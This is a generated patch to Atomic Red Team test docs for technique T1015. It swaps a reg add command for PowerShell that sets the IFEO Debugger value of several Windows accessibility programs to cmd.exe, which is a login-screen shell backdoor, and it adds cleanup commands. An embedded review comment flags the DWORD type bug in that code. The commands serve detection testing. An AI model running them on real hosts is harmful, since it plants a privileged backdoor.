From 23285cf6cbd05f258ab508c83532dbc5fff232d5 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Mon, 6 Jan 2020 21:07:55 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master
---
 atomics/T1015/T1015.md | 133 +++++++++++++++++--
 atomics/index.yaml | 290 +++++++++++++++++++++++++++++++++--------
 2 files changed, 353 insertions(+), 70 deletions(-)
diff --git a/atomics/T1015/T1015.md b/atomics/T1015/T1015.md
index ddc960dd..0d61b1ca 100644
--- a/atomics/T1015/T1015.md
+++ b/atomics/T1015/T1015.md
@@ -48,12 +48,27 @@ This allows adversaries to execute the attached process
 |------|-------------|------|---------------|
 | target_executable | File You Want To Attach cmd To | String | osk.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
 ```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
 ```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
+```
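Review bot: `-PropertyType DWORD` on the `New-ItemProperty` line in the `IF` branch does not match the value being written: `$Value` is the string path `C:\windows\system32\cmd.exe`, and the `reg add` line it replaces wrote that value as `REG_SZ`, so on a host where the IFEO key does not yet exist the cmdlet should fail to convert the string to a DWORD and the Debugger value is never created, meaning the test silently stops exercising the technique it is meant to give detection coverage for; the line should read `New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType String -Force`. The `ELSE` branch omits `-Force`, so a second run against an already-present Debugger value errors instead of updating it; using the same `-PropertyType String -Force` form there makes the test re-runnable. The input table still declares `target_executable`, but `$registryPath` and the cleanup `reg delete` now hard-code `osk.exe`, so the input is dead — either interpolate `#{target_executable}` in both places or drop the input row. The same three issues repeat verbatim in the other six T1015.md hunks and in all fourteen index.yaml hunks below; as the subject says these files are generated, the fix belongs in the source atomic definition they are rendered from rather than in these outputs.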

@@ -69,12 +84,27 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | sethc.exe| -#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) +#### Run it with `powershell`! Elevation Required (e.g. root or admin) ``` -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" +$Value = "C:\windows\system32\cmd.exe" +$Name = "Debugger" +IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } +ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } ``` +#### Cleanup Commands: +``` +reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f +```

@@ -90,12 +120,27 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | utilman.exe| -#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) +#### Run it with `powershell`! Elevation Required (e.g. root or admin) ``` -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" +$Value = "C:\windows\system32\cmd.exe" +$Name = "Debugger" +IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } +ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } ``` +#### Cleanup Commands: +``` +reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /f +```

@@ -111,12 +156,27 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | magnify.exe| -#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) +#### Run it with `powershell`! Elevation Required (e.g. root or admin) ``` -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" +$Value = "C:\windows\system32\cmd.exe" +$Name = "Debugger" +IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } +ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } ``` +#### Cleanup Commands: +``` +reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /f +```

@@ -132,12 +192,27 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | narrator.exe| -#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) +#### Run it with `powershell`! Elevation Required (e.g. root or admin) ``` -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" +$Value = "C:\windows\system32\cmd.exe" +$Name = "Debugger" +IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } +ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } ``` +#### Cleanup Commands: +``` +reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger /f +```

@@ -153,12 +228,27 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe| -#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) +#### Run it with `powershell`! Elevation Required (e.g. root or admin) ``` -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" +$Value = "C:\windows\system32\cmd.exe" +$Name = "Debugger" +IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } +ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } ``` +#### Cleanup Commands: +``` +reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /f +```

@@ -174,11 +264,26 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | atbroker.exe| -#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) +#### Run it with `powershell`! Elevation Required (e.g. root or admin) ``` -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" +$Value = "C:\windows\system32\cmd.exe" +$Name = "Debugger" +IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force | Out-Null + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } +ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } ``` +#### Cleanup Commands: +``` +reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger /f +```
diff --git a/atomics/index.yaml b/atomics/index.yaml index d45fda18..c9c29c2d 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -178,11 +178,23 @@ persistence: type: String default: osk.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f ' - name: Attaches Command Prompt As Debugger To Process - sethc 
@@ -197,11 +209,23 @@ persistence: type: String default: sethc.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f ' - name: Attaches Command Prompt As Debugger To Process - utilman @@ -216,11 +240,24 @@ persistence: type: String default: utilman.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - magnify 
@@ -235,11 +272,24 @@ persistence: type: String default: magnify.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - narrator @@ -254,11 +304,24 @@ persistence: type: String default: narrator.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - DisplaySwitch 
@@ -273,11 +336,24 @@ persistence: type: String default: DisplaySwitch.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - AtBroker @@ -292,11 +368,24 @@ persistence: type: String default: atbroker.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force | Out-Null + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger + /f ' T1098: 
@@ -12754,11 +12843,23 @@ privilege-escalation: type: String default: osk.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f ' - name: Attaches Command Prompt As Debugger To Process - sethc @@ -12773,11 +12874,23 @@ privilege-escalation: type: String default: sethc.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f ' - name: Attaches Command Prompt As Debugger To Process - utilman 
@@ -12792,11 +12905,24 @@ privilege-escalation: type: String default: utilman.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - magnify 
@@ -12811,11 +12937,24 @@ privilege-escalation: type: String default: magnify.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - narrator 
@@ -12830,11 +12969,24 @@ privilege-escalation: type: String default: narrator.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - DisplaySwitch 
@@ -12849,11 +13001,24 @@ privilege-escalation: type: String default: DisplaySwitch.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - AtBroker @@ -12868,11 +13033,24 @@ privilege-escalation: type: String default: atbroker.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force | Out-Null + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger + /f ' '':